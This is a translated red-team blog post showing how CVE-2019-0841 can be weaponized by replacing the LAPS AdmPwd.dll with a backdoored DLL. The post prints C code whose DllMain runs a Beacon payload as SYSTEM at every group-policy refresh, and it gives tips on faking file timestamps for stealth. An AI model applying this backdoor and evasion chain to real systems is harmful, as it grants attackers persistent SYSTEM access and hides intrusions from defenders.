利用LAPS武器化CVE-2019-0841

4月9日，Nabeel Ahmed公布了CVE-2019-0841漏洞的细节。它可让低权限用户完全控制NT AUTHORITY\SYSTEM所属的文件，易引发权限提升攻击。Nabeel发布了一篇博客文章，详细描述了漏洞，并且还带有PoC代码和演示视频。

从视频中我们可以看到，一个低权限用户完全控制了psmachine.dll，然后利用谷歌Chrome的更新服务获得了一个SYSTEM权限的shell。但是，视频中的一系列操作在实际渗透操作中显然是很困难的，所以我和RythmStick一起尝试把这个权限提升方法模拟应用在实际渗透过程中。

不同于视频中利用Chrome浏览器作为攻击中介，RythmStick这次找到了LAPS作为我们的利用目标。

LAPS（Local Administrator Password Solution），本地管理员密码管理方案，用来集中管理域内主机本地管理员的口令，微软2015年发布。

我们已经知道了一些滥用LAPS的方法，而这次我们想利用一个DLL文件来创造一个system权限的shell。

本地计算机通过`AdmPwd.dll`执行所有LAPS功能，而且此DLL没有完整性检查，可以被修改替换。

开端

在我们的演示中，有一个HTTP Beacon，可看作一个低权限用户。该用户肯定不是本地管理员。

首先，让我们看看AdmPwd.dll的相关权限，以证明我们目前无法控制它。

CVE-2019-0841

Nabeel的PoC是用C语言编写的，所以我们必须将它上传到目标机器上运行。

再次检查文件的权限，现在，我们已完全控制了该文件。

AdmPwd.dll

此时，你可以将后门放置在你喜欢的任何位置，具体取决于你希望的后门触发条件。我们选择利用DllMain，以便在每个gpupdate（组策略刷新）时触发，但我认为将其在密码重置时触发是一个更有趣的权限维持方法。

因为我C语言能力很糟糕，所以只编写了一个非常简单的操作CreateProcess，它会以system权限运行一个恶意软件TikiSpawn.exe，里面包含了DNS Beacon的payload。

void Backdoor()
{
    STARTUPINFO sInfo;
    PROCESS_INFORMATION pInfo;

    RtlSecureZeroMemory(&sInfo, sizeof(sInfo));
    RtlSecureZeroMemory(&pInfo, sizeof(pInfo));
    sInfo.cb = sizeof(sInfo);

    GetStartupInfoW(&sInfo);

    CreateProcess(L"C:\\Windows\\System32\\Tasks\\TikiSpawn.exe", NULL, NULL, NULL, FALSE, NULL, NULL, L"C:\\Windows\\System32",
        &sInfo, &pInfo);

    CloseHandle(pInfo.hProcess);
    CloseHandle(pInfo.hThread);

    return;
}


//DllMain, Installation, Uninstallation
BOOL APIENTRY DllMain( HANDLE hModule, DWORD  ul_reason, LPVOID lpReserved) {
    if(ul_reason==DLL_PROCESS_ATTACH) {
        Backdoor();
        hDll=(HINSTANCE)hModule;
    }
    return TRUE;
}

覆盖DLL文件是非常简单的，直接进入文件夹C:\Program Files\LAPS\CSE，上传即可。

时间戳

这时，你还可以修改其时间戳，让它看起来更合理。如果机器已安装了LAPS的UI，那么可以把时间戳修改的和AdmPwd.Utils.dll一样。

请注意，上图中CSE目录的04/13/2019是LAPS的安装日期。

GPUpdate

在组策略刷新之后，我们获得了DNS Beacon。

以下就是Beacon在Process Explorer中的表现。看起来和系统自启动的正常程序很相似，虽然也有一些其他的问题（我也许会另写一篇文章来说明）。

在几个小时后，我们得到了一堆Beacon。

感谢你的阅读！

本文由白帽汇整理并翻译，不代表白帽汇任何观点和立场
来源：https://rastamouse.me/2019/04/weaponizing-cve-2019-0841-with-laps/